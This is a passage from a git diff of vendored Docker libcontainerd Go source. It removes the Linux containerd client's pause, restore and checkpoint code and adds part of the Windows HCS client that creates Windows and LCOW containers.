clnt.getContainer(containerID); err != nil { - return err - } - _, err := clnt.remote.apiClient.UpdateProcess(context.Background(), &containerd.UpdateProcessRequest{ - Id: containerID, - Pid: processFriendlyName, - Width: uint32(width), - Height: uint32(height), - }) - return err -} - -func (clnt *client) Pause(containerID 
string) error { - return clnt.setState(containerID, StatePause) -} - -func (clnt *client) setState(containerID, state string) error { - clnt.lock(containerID) - container, err := clnt.getContainer(containerID) - if err != nil { - clnt.unlock(containerID) - return err - } - if container.systemPid == 0 { - clnt.unlock(containerID) - return fmt.Errorf("No active process for container %s", containerID) - } - st := "running" - if state == StatePause { - st = "paused" - } - chstate := make(chan struct{}) - _, err = clnt.remote.apiClient.UpdateContainer(context.Background(), &containerd.UpdateContainerRequest{ - Id: containerID, - Pid: InitFriendlyName, - Status: st, - }) - if err != nil { - clnt.unlock(containerID) - return err - } - container.pauseMonitor.append(state, chstate) - clnt.unlock(containerID) - <-chstate - return nil -} - -func (clnt *client) Resume(containerID string) error { - return clnt.setState(containerID, StateResume) -} - -func (clnt *client) Stats(containerID string) (*Stats, error) { - resp, err := clnt.remote.apiClient.Stats(context.Background(), &containerd.StatsRequest{containerID}) - if err != nil { - return nil, err - } - return (*Stats)(resp), nil -} - -// Take care of the old 1.11.0 behavior in case the version upgrade -// happened without a clean daemon shutdown -func (clnt *client) cleanupOldRootfs(containerID string) { - // Unmount and delete the bundle folder - if mts, err := mount.GetMounts(); err == nil { - for _, mts := range mts { - if strings.HasSuffix(mts.Mountpoint, containerID+"/rootfs") { - if err := syscall.Unmount(mts.Mountpoint, syscall.MNT_DETACH); err == nil { - os.RemoveAll(strings.TrimSuffix(mts.Mountpoint, "/rootfs")) - } - break - } - } - } -} - -func (clnt *client) setExited(containerID string, exitCode uint32) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - - err := clnt.backend.StateChanged(containerID, StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: StateExit, - ExitCode: exitCode, - }}) 
- - clnt.cleanupOldRootfs(containerID) - - return err -} - -func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) { - cont, err := clnt.getContainerdContainer(containerID) - if err != nil { - return nil, err - } - pids := make([]int, len(cont.Pids)) - for i, p := range cont.Pids { - pids[i] = int(p) - } - return pids, nil -} - -// Summary returns a summary of the processes running in a container. -// This is a no-op on Linux. -func (clnt *client) Summary(containerID string) ([]Summary, error) { - return nil, nil -} - -func (clnt *client) getContainerdContainer(containerID string) (*containerd.Container, error) { - resp, err := clnt.remote.apiClient.State(context.Background(), &containerd.StateRequest{Id: containerID}) - if err != nil { - return nil, err - } - for _, cont := range resp.Containers { - if cont.Id == containerID { - return cont, nil - } - } - return nil, fmt.Errorf("invalid state response") -} - -func (clnt *client) UpdateResources(containerID string, resources Resources) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - container, err := clnt.getContainer(containerID) - if err != nil { - return err - } - if container.systemPid == 0 { - return fmt.Errorf("No active process for container %s", containerID) - } - _, err = clnt.remote.apiClient.UpdateContainer(context.Background(), &containerd.UpdateContainerRequest{ - Id: containerID, - Pid: InitFriendlyName, - Resources: (*containerd.UpdateResource)(&resources), - }) - if err != nil { - return err - } - return nil -} - -func (clnt *client) getExitNotifier(containerID string) *exitNotifier { - clnt.mapMutex.RLock() - defer clnt.mapMutex.RUnlock() - return clnt.exitNotifiers[containerID] -} - -func (clnt *client) getOrCreateExitNotifier(containerID string) *exitNotifier { - clnt.mapMutex.Lock() - w, ok := clnt.exitNotifiers[containerID] - defer clnt.mapMutex.Unlock() - if !ok { - w = &exitNotifier{c: make(chan struct{}), client: clnt} - clnt.exitNotifiers[containerID] 
= w - } - return w -} - -func (clnt *client) restore(cont *containerd.Container, lastEvent *containerd.Event, attachStdio StdioCallback, options ...CreateOption) (err error) { - clnt.lock(cont.Id) - defer clnt.unlock(cont.Id) - - logrus.Debugf("libcontainerd: restore container %s state %s", cont.Id, cont.Status) - - containerID := cont.Id - if _, err := clnt.getContainer(containerID); err == nil { - return fmt.Errorf("container %s is already active", containerID) - } - - defer func() { - if err != nil { - clnt.deleteContainer(cont.Id) - } - }() - - container := clnt.newContainer(cont.BundlePath, options...) - container.systemPid = systemPid(cont) - - var terminal bool - for _, p := range cont.Processes { - if p.Pid == InitFriendlyName { - terminal = p.Terminal - } - } - - fifoCtx, cancel := context.WithCancel(context.Background()) - defer func() { - if err != nil { - cancel() - } - }() - - iopipe, err := container.openFifos(fifoCtx, terminal) - if err != nil { - return err - } - var stdinOnce sync.Once - stdin := iopipe.Stdin - iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error { - var err error - stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed - err = stdin.Close() - }) - return err - }) - - if err := attachStdio(*iopipe); err != nil { - container.closeFifos(iopipe) - return err - } - - clnt.appendContainer(container) - - err = clnt.backend.StateChanged(containerID, StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: StateRestore, - Pid: container.systemPid, - }}) - - if err != nil { - container.closeFifos(iopipe) - return err - } - - if lastEvent != nil { - // This should only be a pause or resume event - if lastEvent.Type == StatePause || lastEvent.Type == StateResume { - return clnt.backend.StateChanged(containerID, StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: lastEvent.Type, - Pid: container.systemPid, - }}) - } - - logrus.Warnf("libcontainerd: unexpected backlog event: %#v", lastEvent) - } - 
- return nil -} - -func (clnt *client) getContainerLastEventSinceTime(id string, tsp *timestamp.Timestamp) (*containerd.Event, error) { - er := &containerd.EventsRequest{ - Timestamp: tsp, - StoredOnly: true, - Id: id, - } - events, err := clnt.remote.apiClient.Events(context.Background(), er) - if err != nil { - logrus.Errorf("libcontainerd: failed to get container events stream for %s: %q", er.Id, err) - return nil, err - } - - var ev *containerd.Event - for { - e, err := events.Recv() - if err != nil { - if err.Error() == "EOF" { - break - } - logrus.Errorf("libcontainerd: failed to get container event for %s: %q", id, err) - return nil, err - } - ev = e - logrus.Debugf("libcontainerd: received past event %#v", ev) - } - - return ev, nil -} - -func (clnt *client) getContainerLastEvent(id string) (*containerd.Event, error) { - ev, err := clnt.getContainerLastEventSinceTime(id, clnt.remote.restoreFromTimestamp) - if err == nil && ev == nil { - // If ev is nil and the container is running in containerd, - // we already consumed all the event of the - // container, included the "exit" one. - // Thus, we request all events containerd has in memory for - // this container in order to get the last one (which should - // be an exit event) - logrus.Warnf("libcontainerd: client is out of sync, restore was called on a fully synced container (%s).", id) - // Request all events since beginning of time - t := time.Unix(0, 0) - tsp, err := ptypes.TimestampProto(t) - if err != nil { - logrus.Errorf("libcontainerd: getLastEventSinceTime() failed to convert timestamp: %q", err) - return nil, err - } - - return clnt.getContainerLastEventSinceTime(id, tsp) - } - - return ev, err -} - -func (clnt *client) Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error { - // Synchronize with live events - clnt.remote.Lock() - defer clnt.remote.Unlock() - // Check that containerd still knows this container. 
- // - // In the unlikely event that Restore for this container process - // the its past event before the main loop, the event will be - // processed twice. However, this is not an issue as all those - // events will do is change the state of the container to be - // exactly the same. - cont, err := clnt.getContainerdContainer(containerID) - // Get its last event - ev, eerr := clnt.getContainerLastEvent(containerID) - if err != nil || cont.Status == "Stopped" { - if err != nil { - logrus.Warnf("libcontainerd: failed to retrieve container %s state: %v", containerID, err) - } - if ev != nil && (ev.Pid != InitFriendlyName || ev.Type != StateExit) { - // Wait a while for the exit event - timeout := time.NewTimer(10 * time.Second) - tick := time.NewTicker(100 * time.Millisecond) - stop: - for { - select { - case <-timeout.C: - break stop - case <-tick.C: - ev, eerr = clnt.getContainerLastEvent(containerID) - if eerr != nil { - break stop - } - if ev != nil && ev.Pid == InitFriendlyName && ev.Type == StateExit { - break stop - } - } - } - timeout.Stop() - tick.Stop() - } - - // get the exit status for this container, if we don't have - // one, indicate an error - ec := uint32(255) - if eerr == nil && ev != nil && ev.Pid == InitFriendlyName && ev.Type == StateExit { - ec = ev.Status - } - clnt.setExited(containerID, ec) - - return nil - } - - // container is still alive - if clnt.liveRestore { - if err := clnt.restore(cont, ev, attachStdio, options...); err != nil { - logrus.Errorf("libcontainerd: error restoring %s: %v", containerID, err) - } - return nil - } - - // Kill the container if liveRestore == false - w := clnt.getOrCreateExitNotifier(containerID) - clnt.lock(cont.Id) - container := clnt.newContainer(cont.BundlePath) - container.systemPid = systemPid(cont) - clnt.appendContainer(container) - clnt.unlock(cont.Id) - - container.discardFifos() - - if err := clnt.Signal(containerID, int(syscall.SIGTERM)); err != nil { - logrus.Errorf("libcontainerd: error sending 
sigterm to %v: %v", containerID, err) - } - // Let the main loop handle the exit event - clnt.remote.Unlock() - select { - case <-time.After(10 * time.Second): - if err := clnt.Signal(containerID, int(syscall.SIGKILL)); err != nil { - logrus.Errorf("libcontainerd: error sending sigkill to %v: %v", containerID, err) - } - select { - case <-time.After(2 * time.Second): - case <-w.wait(): - // relock because of the defer - clnt.remote.Lock() - return nil - } - case <-w.wait(): - // relock because of the defer - clnt.remote.Lock() - return nil - } - // relock because of the defer - clnt.remote.Lock() - - clnt.deleteContainer(containerID) - - return clnt.setExited(containerID, uint32(255)) -} - -func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - if _, err := clnt.getContainer(containerID); err != nil { - return err - } - - _, err := clnt.remote.apiClient.CreateCheckpoint(context.Background(), &containerd.CreateCheckpointRequest{ - Id: containerID, - Checkpoint: &containerd.Checkpoint{ - Name: checkpointID, - Exit: exit, - Tcp: true, - UnixSockets: true, - Shell: false, - EmptyNS: []string{"network"}, - }, - CheckpointDir: checkpointDir, - }) - return err -} - -func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - if _, err := clnt.getContainer(containerID); err != nil { - return err - } - - _, err := clnt.remote.apiClient.DeleteCheckpoint(context.Background(), &containerd.DeleteCheckpointRequest{ - Id: containerID, - Name: checkpointID, - CheckpointDir: checkpointDir, - }) - return err -} - -func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) { - clnt.lock(containerID) - defer clnt.unlock(containerID) - if _, err := clnt.getContainer(containerID); err != nil { - return nil, err - } - - 
resp, err := clnt.remote.apiClient.ListCheckpoint(context.Background(), &containerd.ListCheckpointRequest{ - Id: containerID, - CheckpointDir: checkpointDir, - }) - if err != nil { - return nil, err - } - return (*Checkpoints)(resp), nil -} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_local_windows.go b/vendor/github.com/docker/docker/libcontainerd/client_local_windows.go new file mode 100644 index 0000000000..6e3454e514 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client_local_windows.go @@ -0,0 +1,1319 @@ +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "context" + "encoding/json" + "fmt" + "io/ioutil" + "os" + "path" + "path/filepath" + "regexp" + "strings" + "sync" + "syscall" + "time" + + "github.com/Microsoft/hcsshim" + opengcs "github.com/Microsoft/opengcs/client" + "github.com/containerd/containerd" + "github.com/containerd/containerd/cio" + "github.com/docker/docker/pkg/sysinfo" + "github.com/docker/docker/pkg/system" + specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sys/windows" +) + +const InitProcessName = "init" + +type process struct { + id string + pid int + hcsProcess hcsshim.Process +} + +type container struct { + sync.Mutex + + // The ociSpec is required, as client.Create() needs a spec, but can + // be called from the RestartManager context which does not otherwise + // have access to the Spec + ociSpec *specs.Spec + + isWindows bool + manualStopRequested bool + hcsContainer hcsshim.Container + + id string + status Status + exitedAt time.Time + exitCode uint32 + waitCh chan struct{} + init *process + execs map[string]*process + updatePending bool +} + +// Win32 error codes that are used for various workarounds +// These really should be ALL_CAPS to match golangs syscall library and standard +// Win32 error conventions, but golint insists on CamelCase. 
+const ( + CoEClassstring = syscall.Errno(0x800401F3) // Invalid class string + ErrorNoNetwork = syscall.Errno(1222) // The network is not present or not started + ErrorBadPathname = syscall.Errno(161) // The specified path is invalid + ErrorInvalidObject = syscall.Errno(0x800710D8) // The object identifier does not represent a valid object +) + +// defaultOwner is a tag passed to HCS to allow it to differentiate between +// container creator management stacks. We hard code "docker" in the case +// of docker. +const defaultOwner = "docker" + +func (c *client) Version(ctx context.Context) (containerd.Version, error) { + return containerd.Version{}, errors.New("not implemented on Windows") +} + +// Create is the entrypoint to create a container from a spec. +// Table below shows the fields required for HCS JSON calling parameters, +// where if not populated, is omitted. +// +-----------------+--------------------------------------------+---------------------------------------------------+ +// | | Isolation=Process | Isolation=Hyper-V | +// +-----------------+--------------------------------------------+---------------------------------------------------+ +// | VolumePath | \\?\\Volume{GUIDa} | | +// | LayerFolderPath | %root%\windowsfilter\containerID | | +// | Layers[] | ID=GUIDb;Path=%root%\windowsfilter\layerID | ID=GUIDb;Path=%root%\windowsfilter\layerID | +// | HvRuntime | | ImagePath=%root%\BaseLayerID\UtilityVM | +// +-----------------+--------------------------------------------+---------------------------------------------------+ +// +// Isolation=Process example: +// +// { +// "SystemType": "Container", +// "Name": "5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776", +// "Owner": "docker", +// "VolumePath": "\\\\\\\\?\\\\Volume{66d1ef4c-7a00-11e6-8948-00155ddbef9d}", +// "IgnoreFlushesDuringBoot": true, +// "LayerFolderPath": "C:\\\\control\\\\windowsfilter\\\\5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776", +// "Layers": [{ 
+// "ID": "18955d65-d45a-557b-bf1c-49d6dfefc526", +// "Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c" +// }], +// "HostName": "5e0055c814a6", +// "MappedDirectories": [], +// "HvPartition": false, +// "EndpointList": ["eef2649d-bb17-4d53-9937-295a8efe6f2c"], +//} +// +// Isolation=Hyper-V example: +// +//{ +// "SystemType": "Container", +// "Name": "475c2c58933b72687a88a441e7e0ca4bd72d76413c5f9d5031fee83b98f6045d", +// "Owner": "docker", +// "IgnoreFlushesDuringBoot": true, +// "Layers": [{ +// "ID": "18955d65-d45a-557b-bf1c-49d6dfefc526", +// "Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c" +// }], +// "HostName": "475c2c58933b", +// "MappedDirectories": [], +// "HvPartition": true, +// "EndpointList": ["e1bb1e61-d56f-405e-b75d-fd520cefa0cb"], +// "DNSSearchList": "a.com,b.com,c.com", +// "HvRuntime": { +// "ImagePath": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c\\\\UtilityVM" +// }, +//} +func (c *client) Create(_ context.Context, id string, spec *specs.Spec, runtimeOptions interface{}) error { + if ctr := c.getContainer(id); ctr != nil { + return errors.WithStack(newConflictError("id already in use")) + } + + // spec.Linux must be nil for Windows containers, but spec.Windows + // will be filled in regardless of container platform. This is a + // temporary workaround due to LCOW requiring layer folder paths, + // which are stored under spec.Windows. 
+ // + // TODO: @darrenstahlmsft fix this once the OCI spec is updated to + // support layer folder paths for LCOW + if spec.Linux == nil { + return c.createWindows(id, spec, runtimeOptions) + } + return c.createLinux(id, spec, runtimeOptions) +} + +func (c *client) createWindows(id string, spec *specs.Spec, runtimeOptions interface{}) error { + logger := c.logger.WithField("container", id) + configuration := &hcsshim.ContainerConfig{ + SystemType: "Container", + Name: id, + Owner: defaultOwner, + IgnoreFlushesDuringBoot: spec.Windows.IgnoreFlushesDuringBoot, + HostName: spec.Hostname, + HvPartition: false, + } + + if spec.Windows.Resources != nil { + if spec.Windows.Resources.CPU != nil { + if spec.Windows.Resources.CPU.Count != nil { + // This check is being done here rather than in adaptContainerSettings + // because we don't want to update the HostConfig in case this container + // is moved to a host with more CPUs than this one. + cpuCount := *spec.Windows.Resources.CPU.Count + hostCPUCount := uint64(sysinfo.NumCPU()) + if cpuCount > hostCPUCount { + c.logger.Warnf("Changing requested CPUCount of %d to current number of processors, %d", cpuCount, hostCPUCount) + cpuCount = hostCPUCount + } + configuration.ProcessorCount = uint32(cpuCount) + } + if spec.Windows.Resources.CPU.Shares != nil { + configuration.ProcessorWeight = uint64(*spec.Windows.Resources.CPU.Shares) + } + if spec.Windows.Resources.CPU.Maximum != nil { + configuration.ProcessorMaximum = int64(*spec.Windows.Resources.CPU.Maximum) + } + } + if spec.Windows.Resources.Memory != nil { + if spec.Windows.Resources.Memory.Limit != nil { + configuration.MemoryMaximumInMB = int64(*spec.Windows.Resources.Memory.Limit) / 1024 / 1024 + } + } + if spec.Windows.Resources.Storage != nil { + if spec.Windows.Resources.Storage.Bps != nil { + configuration.StorageBandwidthMaximum = *spec.Windows.Resources.Storage.Bps + } + if spec.Windows.Resources.Storage.Iops != nil { + configuration.StorageIOPSMaximum = 
*spec.Windows.Resources.Storage.Iops + } + } + } + + if spec.Windows.HyperV != nil { + configuration.HvPartition = true + } + + if spec.Windows.Network != nil { + configuration.EndpointList = spec.Windows.Network.EndpointList + configuration.AllowUnqualifiedDNSQuery = spec.Windows.Network.AllowUnqualifiedDNSQuery + if spec.Windows.Network.DNSSearchList != nil { + configuration.DNSSearchList = strings.Join(spec.Windows.Network.DNSSearchList, ",") + } + configuration.NetworkSharedContainerName = spec.Windows.Network.NetworkSharedContainerName + } + + if cs, ok := spec.Windows.CredentialSpec.(string); ok { + configuration.Credentials = cs + } + + // We must have least two layers in the spec, the bottom one being a + // base image, the top one being the RW layer. + if spec.Windows.LayerFolders == nil || len(spec.Windows.LayerFolders) < 2 { + return fmt.Errorf("OCI spec is invalid - at least two LayerFolders must be supplied to the runtime") + } + + // Strip off the top-most layer as that's passed in separately to HCS + configuration.LayerFolderPath = spec.Windows.LayerFolders[len(spec.Windows.LayerFolders)-1] + layerFolders := spec.Windows.LayerFolders[:len(spec.Windows.LayerFolders)-1] + + if configuration.HvPartition { + // We don't currently support setting the utility VM image explicitly. + // TODO @swernli/jhowardmsft circa RS5, this may be re-locatable. + if spec.Windows.HyperV.UtilityVMPath != "" { + return errors.New("runtime does not support an explicit utility VM path for Hyper-V containers") + } + + // Find the upper-most utility VM image. 
+ var uvmImagePath string + for _, path := range layerFolders { + fullPath := filepath.Join(path, "UtilityVM") + _, err := os.Stat(fullPath) + if err == nil { + uvmImagePath = fullPath + break + } + if !os.IsNotExist(err) { + return err + } + } + if uvmImagePath == "" { + return errors.New("utility VM image could not be found") + } + configuration.HvRuntime = &hcsshim.HvRuntime{ImagePath: uvmImagePath} + + if spec.Root.Path != "" { + return errors.New("OCI spec is invalid - Root.Path must be omitted for a Hyper-V container") + } + } else { + const volumeGUIDRegex = `^\\\\\?\\(Volume)\{{0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}\}\\$` + if _, err := regexp.MatchString(volumeGUIDRegex, spec.Root.Path); err != nil { + return fmt.Errorf(`OCI spec is invalid - Root.Path '%s' must be a volume GUID path in the format '\\?\Volume{GUID}\'`, spec.Root.Path) + } + // HCS API requires the trailing backslash to be removed + configuration.VolumePath = spec.Root.Path[:len(spec.Root.Path)-1] + } + + if spec.Root.Readonly { + return errors.New(`OCI spec is invalid - Root.Readonly must not be set on Windows`) + } + + for _, layerPath := range layerFolders { + _, filename := filepath.Split(layerPath) + g, err := hcsshim.NameToGuid(filename) + if err != nil { + return err + } + configuration.Layers = append(configuration.Layers, hcsshim.Layer{ + ID: g.ToString(), + Path: layerPath, + }) + } + + // Add the mounts (volumes, bind mounts etc) to the structure + var mds []hcsshim.MappedDir + var mps []hcsshim.MappedPipe + for _, mount := range spec.Mounts { + const pipePrefix = `\\.\pipe\` + if mount.Type != "" { + return fmt.Errorf("OCI spec is invalid - Mount.Type '%s' must not be set", mount.Type) + } + if strings.HasPrefix(mount.Destination, pipePrefix) { + mp := hcsshim.MappedPipe{ + HostPath: mount.Source, + ContainerPipeName: mount.Destination[len(pipePrefix):], + } + mps = append(mps, mp) + } else { + md := hcsshim.MappedDir{ + 
HostPath: mount.Source, + ContainerPath: mount.Destination, + ReadOnly: false, + } + for _, o := range mount.Options { + if strings.ToLower(o) == "ro" { + md.ReadOnly = true + } + } + mds = append(mds, md) + } + } + configuration.MappedDirectories = mds + if len(mps) > 0 && system.GetOSVersion().Build < 16299 { // RS3 + return errors.New("named pipe mounts are not supported on this version of Windows") + } + configuration.MappedPipes = mps + + hcsContainer, err := hcsshim.CreateContainer(id, configuration) + if err != nil { + return err + } + + // Construct a container object for calling start on it. + ctr := &container{ + id: id, + execs: make(map[string]*process), + isWindows: true, + ociSpec: spec, + hcsContainer: hcsContainer, + status: StatusCreated, + waitCh: make(chan struct{}), + } + + logger.Debug("starting container") + if err = hcsContainer.Start(); err != nil { + c.logger.WithError(err).Error("failed to start container") + ctr.debugGCS() + if err := c.terminateContainer(ctr); err != nil { + c.logger.WithError(err).Error("failed to cleanup after a failed Start") + } else { + c.logger.Debug("cleaned up after failed Start by calling Terminate") + } + return err + } + ctr.debugGCS() + + c.Lock() + c.containers[id] = ctr + c.Unlock() + + logger.Debug("createWindows() completed successfully") + return nil + +} + +func (c *client) createLinux(id string, spec *specs.Spec, runtimeOptions interface{}) error { + logrus.Debugf("libcontainerd: createLinux(): containerId %s ", id) + logger := c.logger.WithField("container", id) + + if runtimeOptions == nil { + return fmt.Errorf("lcow option must be supplied to the runtime") + } + lcowConfig, ok := runtimeOptions.(*opengcs.Config) + if !ok { + return fmt.Errorf("lcow option must be supplied to the runtime") + } + + configuration := &hcsshim.ContainerConfig{ + HvPartition: true, + Name: id, + SystemType: "container", + ContainerType: "linux", + Owner: defaultOwner, + TerminateOnLastHandleClosed: true, + } + + if 
lcowConfig.ActualMode == opengcs.ModeActualVhdx { + configuration.HvRuntime = &hcsshim.HvRuntime{ + ImagePath: lcowConfig.Vhdx, + BootSource: "Vhd", + WritableBootSource: false, + } + } else { + configuration.HvRuntime = &hcsshim.HvRuntime{ + ImagePath: lcowConfig.KirdPath, + LinuxKernelFile: lcowConfig.KernelFile, + LinuxInitrdFile: lcowConfig.InitrdFile, + LinuxBootParameters: lcowConfig.BootParameters, + } + } + + if spec.Windows == nil { + return fmt.Errorf("spec.Windows must not be nil for LCOW containers") + } + + // We must have least one layer in the spec + if spec.Windows.LayerFolders == nil || len(spec.Windows.LayerFolders) == 0 { + return fmt.Errorf("OCI spec is invalid - at least one LayerFolders must be supplied to the runtime") + } + + // Strip off the top-most layer as that's passed in separately to HCS + configuration.LayerFolderPath = spec.Windows.LayerFolders[len(spec.Windows.LayerFolders)-1] + layerFolders := spec.Windows.LayerFolders[:len(spec.Windows.LayerFolders)-1] + + for _, layerPath := range layerFolders { + _, filename := filepath.Split(layerPath) + g, err := hcsshim.NameToGuid(filename) + if err != nil { + return err + } + configuration.Layers = append(configuration.Layers, hcsshim.Layer{ + ID: g.ToString(), + Path: filepath.Join(layerPath, "layer.vhd"), + }) + } + + if spec.Windows.Network != nil { + configuration.EndpointList = spec.Windows.Network.EndpointList + configuration.AllowUnqualifiedDNSQuery = spec.Windows.Network.AllowUnqualifiedDNSQuery + if spec.Windows.Network.DNSSearchList != nil { + configuration.DNSSearchList = strings.Join(spec.Windows.Network.DNSSearchList, ",") + } + configuration.NetworkSharedContainerName = spec.Windows.Network.NetworkSharedContainerName + } + + // Add the mounts (volumes, bind mounts etc) to the structure. We have to do + // some translation for both the mapped directories passed into HCS and in + // the spec. + // + // For HCS, we only pass in the mounts from the spec which are type "bind". 
+ // Further, the "ContainerPath" field (which is a little mis-leadingly + // named when it applies to the utility VM rather than the container in the + // utility VM) is moved to under /tmp/gcs//binds, where this is passed + // by the caller through a 'uvmpath' option. + // + // We do similar translation for the mounts in the spec by stripping out + // the uvmpath option, and translating the Source path to the location in the + // utility VM calculated above. + // + // From inside the utility VM, you would see a 9p mount such as in the following + // where a host folder has been mapped to /target. The line with /tmp/gcs//binds + // specifically: + // + // / # mount + // rootfs on / type rootfs (rw,size=463736k,nr_inodes=115934) + // proc on /proc type proc (rw,relatime) + // sysfs on /sys type sysfs (rw,relatime) + // udev on /dev type devtmpfs (rw,relatime,size=498100k,nr_inodes=124525,mode=755) + // tmpfs on /run type tmpfs (rw,relatime) + // cgroup on /sys/fs/cgroup type cgroup (rw,relatime,cpuset,cpu,cpuacct,blkio,memory,devices,freezer,net_cls,perf_event,net_prio,hugetlb,pids,rdma) + // mqueue on /dev/mqueue type mqueue (rw,relatime) + // devpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000) + // /binds/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/target on /binds/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/target type 9p (rw,sync,dirsync,relatime,trans=fd,rfdno=6,wfdno=6) + // /dev/pmem0 on /tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/layer0 type ext4 (ro,relatime,block_validity,delalloc,norecovery,barrier,dax,user_xattr,acl) + // /dev/sda on /tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/scratch type ext4 (rw,relatime,block_validity,delalloc,barrier,user_xattr,acl) + // overlay on /tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/rootfs type overlay 
(rw,relatime,lowerdir=/tmp/base/:/tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/layer0,upperdir=/tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/scratch/upper,workdir=/tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/scratch/work) + // + // /tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc # ls -l + // total 16 + // drwx------ 3 0 0 60 Sep 7 18:54 binds + // -rw-r--r-- 1 0 0 3345 Sep 7 18:54 config.json + // drwxr-xr-x 10 0 0 4096 Sep 6 17:26 layer0 + // drwxr-xr-x 1 0 0 4096 Sep 7 18:54 rootfs + // drwxr-xr-x 5 0 0 4096 Sep 7 18:54 scratch + // + // /tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc # ls -l binds + // total 0 + // drwxrwxrwt 2 0 0 4096 Sep 7 16:51 target + + mds := []hcsshim.MappedDir{} + specMounts := []specs.Mount{} + for _, mount := range spec.Mounts { + specMount := mount + if mount.Type == "bind" { + // Strip out the uvmpath from the options + updatedOptions := []string{} + uvmPath := "" + readonly := false + for _, opt := range mount.Options { + dropOption := false + elements := strings.SplitN(opt, "=", 2) + switch elements[0] { + case "uvmpath": + uvmPath = elements[1] + dropOption = true + case "rw": + case "ro": + readonly = true + case "rbind": + default: + return fmt.Errorf("unsupported option %q", opt) + } + if !dropOption { + updatedOptions = append(updatedOptions, opt) + } + } + mount.Options = updatedOptions + if uvmPath == "" { + return fmt.Errorf("no uvmpath for bind mount %+v", mount) + } + md := hcsshim.MappedDir{ + HostPath: mount.Source, + ContainerPath: path.Join(uvmPath, mount.Destination), + CreateInUtilityVM: true, + ReadOnly: readonly, + } + mds = append(mds, md) + specMount.Source = path.Join(uvmPath, mount.Destination) + } + specMounts = append(specMounts, specMount) + } + configuration.MappedDirectories = mds + + hcsContainer, err := hcsshim.CreateContainer(id, configuration) + if err != nil { + 
return err + } + + spec.Mounts = specMounts + + // Construct a container object for calling start on it. + ctr := &container{ + id: id, + execs: make(map[string]*process), + isWindows: false, + ociSpec: spec, + hcsContainer: hcsContainer, + status: StatusCreated, + waitCh: make(chan struct{}), + } + + // Start the container. + logger.Debug("starting container") + if err = hcsContainer.Start(); err != nil { + c.logger.WithError(err).Error("failed to start container") + ctr.debugGCS() + if err := c.terminateContainer(ctr); err != nil { + c.logger.WithError(err).Error("failed to cleanup after a failed Start") + } else { + c.logger.Debug("cleaned up after failed Start by calling Terminate") + } + return err + } + ctr.debugGCS() + + c.Lock() + c.containers[id] = ctr + c.Unlock() + + c.eventQ.append(id, func() { + ei := EventInfo{ + ContainerID: id, + } + c.logger.WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventCreate, + }).Info("sending event") + err := c.backend.ProcessEvent(id, EventCreate, ei) + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": id, + "event": EventCreate, + }).Error("failed to process event") + } + }) + + logger.Debug("createLinux() completed successfully") + return nil +} + +func (c *client) Start(_ context.Context, id, _ string, withStdin bool, attachStdio StdioCallback) (int, error) { + ctr := c.getContainer(id) + switch { + case ctr == nil: + return -1, errors.WithStack(newNotFoundError("no such container")) + case ctr.init != nil: + return -1, errors.WithStack(newConflictError("container already started")) + } + + logger := c.logger.WithField("container", id) + + // Note we always tell HCS to create stdout as it's required + // regardless of '-i' or '-t' options, so that docker can always grab + // the output through logs. We also tell HCS to always create stdin, + // even if it's not used - it will be closed shortly. Stderr is only + // created if it we're not -t. 
